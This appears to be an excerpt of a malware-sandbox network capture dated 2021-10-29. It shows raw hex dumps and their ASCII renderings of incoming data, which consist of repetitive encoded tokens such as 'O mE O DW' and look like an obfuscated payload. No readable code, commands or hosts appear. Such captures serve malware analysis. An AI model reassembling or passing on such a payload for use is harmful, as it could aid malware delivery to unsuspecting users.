                                                                                                                          2021-10-29 15:06:43 UTC1017INData Raw: 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20
                                                                                                                          Data Ascii: O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX
                                                                                                                          2021-10-29 15:06:43 UTC1018INData Raw: 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d
                                                                                                                          Data Ascii: O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O m
                                                                                                                          2021-10-29 15:06:43 UTC1019INData Raw: 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f
                                                                                                                          Data Ascii: mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O
                                                                                                                          2021-10-29 15:06:43 UTC1021INData Raw: 4f 20 4f 20 71 71 4d 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 58 45 20 4f 20 71 71 44 20 4f 20 45 44 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 57 4f 20 4f 20 71 71 4d 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 4d 4f 20 4f 20 71 71 44 20 4f 20 45 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 71 6d 20 4f 20 58 6d 20 4f 20 44 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 45 4d 20 4f 20 71 71 70 20 4f 20 71 71 58 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 4f 71 20 4f 20 71 71 4d 20 4f 20 57 44 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 44 58 20 4f 20 71 4f 71 20 4f 20 45 4f 20 4f 20 6d 45 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 58 6d
                                                                                                                          Data Ascii: O O qqM O qOJ O mE O XE O qqD O ED O WW O mE O WO O MX O MX O DW O mE O WE O qOM O WO O qqM O XO O mE O MO O qqD O ED O mE O mE O Wq O qqm O Xm O DE O mE O mp O EM O qqp O qqX O qqX O mE O qOq O qqM O WD O MX O mE O mM O DX O qOq O EO O mE O qJO O MM O Xm
                                                                                                                          2021-10-29 15:06:43 UTC1022INData Raw: 20 58 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4a 4a 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 44 4d 20 4f 20 44 45 20 4f 20 4d 58 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 58 4a 20 4f 20 44 57 20 4f 20 71 4f 4d 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 58 71 20 4f 20 45 6d 20 4f 20 71 71 44 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 44 4d 20 4f 20 44 4d 20 4f 20 4d 58 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 58 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4a 4a 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 4f 20 4f 20 44
                                                                                                                          Data Ascii: XJ O DW O Eq O qJJ O mE O mX O Xq O DD O qqM O mE O WE O DM O DE O MX O qOJ O mE O XJ O DW O qOM O Wq O mE O mX O Xq O Em O qqD O mE O WE O DM O DM O MX O qqX O mE O XJ O DW O Eq O qJJ O mE O mX O Xq O DD O qqW O mE O WD O WD O DW O ME O mE O mE O XO O D
                                                                                                                          2021-10-29 15:06:43 UTC1023INData Raw: 20 57 57 20 4f 20 58 70 20 4f 20 58 70 20 4f 20 45 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 70 20 4f 20 71 4a 4a 20 4f 20 71 4f 58 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 45 58 20 4f 20 71 71 4a 20 4f 20 58 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 44 58 20 4f 20 71 4f 57 20 4f 20 58 6d 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 57 45 20 4f 20 71 4f 71 20 4f 20 71 4f 4d 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 45 20 4f 20 58 4f 20 4f 20 45 70 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 58 71 20 4f 20 58 4a 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 45 71 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 57 4f 20 4f
                                                                                                                          Data Ascii: WW O Xp O Xp O EE O mE O mE O Ep O qJJ O qOX O qqX O mE O mM O EX O qqJ O XX O mE O Wm O DX O qOW O Xm O mE O WW O WE O qOq O qOM O XO O mE O XE O XO O Ep O WW O mE O WO O Xq O XJ O qqX O mE O qJO O MM O DD O DX O Eq O qOp O DW O DW O DW O DW O EX O WO O
                                                                                                                          2021-10-29 15:06:43 UTC1025INData Raw: 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20
                                                                                                                          Data Ascii: DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O
                                                                                                                          2021-10-29 15:06:43 UTC1026INData Raw: 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 70 20 4f 20 58 45 20 4f 20 71 4f 70 20 4f 20 45 57 20 4f 20 58 57 20 4f 20 4d 4f 20 4f 20 58 44 20 4f 20 45 45 20 4f 20 44 58 20 4f 20 71 4a 71 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 45 4f 20 4f 20 71 4f 44 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 58 4f 20 4f 20 58 4a 20 4f 20 58 4d 20 4f 20 6d 4d 20 4f 20 45 70 20 4f 20 44 58 20 4f 20 6d 58 20 4f 20 58 45 20 4f 20 45 58 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 45 4f 20 4f 20 71 4f 44 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 58 4f 20 4f 20 58 4a 20 4f 20 58 4d 20 4f 20 6d 4d 20 4f 20 45 70 20 4f 20 44 58 20 4f
                                                                                                                          Data Ascii: W O DW O DW O DW O DW O DW O DW O DW O DD O qqp O XE O qOp O EW O XW O MO O XD O EE O DX O qJq O WO O EX O Xp O DW O WE O EO O qOD O XW O qOp O XO O XJ O XM O mM O Ep O DX O mX O XE O EX O Xp O DW O WE O EO O qOD O XW O qOp O XO O XJ O XM O mM O Ep O DX O
                                                                                                                          2021-10-29 15:06:43 UTC1027INData Raw: 71 4f 70 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 57 70 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 45 4a 20 4f 20 45 57 20 4f 20 57 4f 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 6d 20 4f 20 71 71 58 20 4f 20 57 44 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 71 71 4d 20 4f 20 71 71 57 20 4f 20 71 4f 4a 20 4f 20 45 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 57 71 20 4f 20 71 4f 57 20 4f 20 57 6d 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 57 4a 20 4f 20 71 71 45 20 4f 20 71 71 4f 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 45 44 20 4f 20 71 71 4a 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 57 71 20 4f 20 71 4f 57 20
                                                                                                                          Data Ascii: qOp O qOJ O mE O EO O qOE O Wp O XO O mE O qqM O MX O WO O XO O mE O WD O EJ O EW O WO O XO O mp O Wm O qqX O WD O qOJ O mE O qqM O qqW O qOJ O EM O mE O WE O Wq O qOW O Wm O qOJ O mE O qOO O WJ O qqE O qqO O mE O Wq O qOq O ED O qqJ O mE O WE O Wq O qOW
                                                                                                                          2021-10-29 15:06:43 UTC1029INData Raw: 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 6d 20 4f 20 71 71 45 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 57 4a 20 4f 20 45 58 20 4f 20 71 4a 71 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 71 20 4f 20 71 4a 4a 20 4f 20 57 45 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 4d 4d 20 4f 20 45 44 20 4f 20 58 71 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 71 71 4f 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 70 20 4f 20 71 71 4d 20 4f 20 71 71 44 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 4d 4d 20 4f 20 45 44 20 4f 20 58 71 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 71 71 4f 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 58 4f 20 4f 20 6d
                                                                                                                          Data Ascii: O mE O qOM O Wm O qqE O qOD O mE O WJ O EX O qJq O Wm O mE O WD O Eq O WE O qOD O mE O mE O Eq O qJJ O WE O WW O mE O qqE O MM O ED O Xq O mE O WW O qqO O DE O mX O XO O mp O Wp O qqM O qqD O DX O mE O qqE O MM O ED O Xq O mE O WW O qqO O DE O mX O XO O m
                                                                                                                          2021-10-29 15:06:43 UTC1030INData Raw: 20 4f 20 6d 45 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 4d 58 20 4f 20 57 57 20 4f 20 57 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 57 20 4f 20 71 4a 4a 20 4f 20 45 6d 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 45 45 20 4f 20 4d 45 20 4f 20 58 6d 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 57 57 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 4d 20 4f 20 71 4a 4f 20 4f 20 4d 4f 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4a 4a 20 4f 20 71 71 57 20 4f 20 58 45 20 4f 20 58 6d 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 57 57 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 4d 20 4f 20 71 4a 4f 20 4f 20 4d 4f 20 4f
                                                                                                                          Data Ascii: O mE O qqX O mE O mp O mE O mE O WW O mE O mE O MX O WW O WD O mE O mE O XW O qJJ O Em O Wq O mE O mX O EE O ME O Xm O mE O WD O WW O EO O qOE O mE O mE O EM O qJO O MO O XO O mE O qJJ O qqW O XE O Xm O mE O WD O WW O EO O qOE O mE O mE O EM O qJO O MO O
                                                                                                                          2021-10-29 15:06:43 UTC1031INData Raw: 20 71 4f 70 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4a 4a 20 4f 20 4d 58 20 4f 20 57 4a 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 71 57 20 4f 20 57 4f 20 4f 20 6d 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4a 4a 20 4f 20 4d 58 20 4f 20 57 4a 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 71 57 20 4f 20 57 4f 20 4f 20 6d 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 70 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4a 4a 20 4f 20 4d 58 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 57 4f 20 4f 20 71 71 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 45 58 20 4f 20 71 71 6d 20 4f 20 71
                                                                                                                          Data Ascii: qOp O mE O mp O qJJ O MX O WJ O XO O mE O qqW O WO O mp O DX O mE O WW O EX O qqX O qOJ O mE O mp O qJJ O MX O WJ O XO O mE O qqW O WO O mp O DX O mE O WW O EX O qqX O qOp O mE O mp O qJJ O MX O Wq O mE O mE O qqm O WO O qqD O mE O mE O WW O EX O qqm O q
                                                                                                                          2021-10-29 15:06:43 UTC1032INData Raw: 20 58 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 58 20 4f 20 45 71 20 4f 20 71 71 71 20 4f 20 45 44 20 4f 20 57 4a 20 4f 20 57 4f 20 4f 20 71 4a 71 20 4f 20 58 45 20 4f 20 44 4d 20 4f 20 6d 70 20 4f 20 71 4f 4f 20 4f 20 4d 4d 20 4f 20 58 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 71 20 4f 20 45 70 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 71 4f 70 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 57 20 4f 20 58 71 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 6d 20 4f 20 44 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 4a 4f 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 71 71 57 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 6d 20 4f 20
                                                                                                                          Data Ascii: XO O qOD O qOX O Eq O qqq O ED O WJ O WO O qJq O XE O DM O mp O qOO O MM O Xq O qOO O qOq O Ep O EJ O DW O DW O Xq O qOp O qOp O DW O Eq O qqW O Xq O MM O DW O DD O qqm O DM O DM O DW O DW O EW O qJO O DD O DW O DW O DE O qqW O Xq O Xq O DW O DW O qqm O
                                                                                                                          2021-10-29 15:06:43 UTC1034INData Raw: 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 57 20 4f 20 45 70 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 57 71 20 4f 20 71 4f 4f 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 57 71 20 4f 20 71 4f 4f 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 57 71 20 4f 20 71 4f 4f 20 4f
                                                                                                                          Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O qOW O Ep O qOp O DW O DW O DW O DW O DW O DW O DW O qOm O Wq O qOO O WJ O DW O DW O DW O DW O DW O DW O qOm O Wq O qOO O Wq O qOq O DW O DW O DW O DW O DW O qOm O Wq O qOO O
                                                                                                                          2021-10-29 15:06:43 UTC1035INData Raw: 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 4f 6d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 6d 58
                                                                                                                          Data Ascii: E O XM O DW O XW O qqM O DD O qOm O DW O EJ O XM O DW O MO O Xq O DW O qOp O DW O EO O EE O DW O MO O Xq O DD O qqW O DW O Eq O XW O DW O XM O qqM O DD O mX O DW O Eq O XW O DW O MO O DW O DW O qOp O DW O DM O qOE O DW O qOO O DW O DD O qOX O DW O Eq O mX
                                                                                                                          2021-10-29 15:06:43 UTC1036INData Raw: 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20
                                                                                                                          Data Ascii: O DW O MO O DW O DW O qOp O DW O DM O qOE O DW O qOO O DW O DD O qOX O DW O Eq O mX O DW O MM O qqM O DW O Em O DW O DM O EE O DW O qOO O DW O DD O qJq O DW O Eq O qqM O DW O EW O qqM O DD O DX O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW
                                                                                                                          2021-10-29 15:06:43 UTC1038INData Raw: 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 58 20 4f 20 45 6d 20 4f 20 71 4a 4f 20 4f 20 45 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 71 6d 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 71 4f 4f
                                                                                                                          Data Ascii: W O qOO O DW O DD O qqJ O DW O EJ O DW O DW O MM O qqM O DW O DW O DW O DW O DW O DW O XX O Em O qJO O EX O DW O Eq O DM O DW O MM O qOp O DD O qqm O DW O DE O DW O DW O Em O qOp O DD O XO O DW O Eq O Xq O DW O MO O DW O DW O qqX O DW O DM O XW O DW O qOO
                                                                                                                          2021-10-29 15:06:43 UTC1039INData Raw: 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 6d 20 4f 20 45 6d 20 4f 20 71 71 4d 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f
                                                                                                                          Data Ascii: O DW O qOp O DW O DM O EE O DW O MX O qqM O DD O qqW O DW O EJ O XW O DW O MX O Xq O DW O qOM O DW O Eq O WJ O DW O MM O qqM O DW O DW O DW O DW O DW O DW O Xm O Em O qqM O qOM O DW O DM O DM O DW O qOO O Xq O DD O mX O DW O Eq O WD O DW O Ep O DW O DD O
                                                                                                                          2021-10-29 15:06:43 UTC1040INData Raw: 4f 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 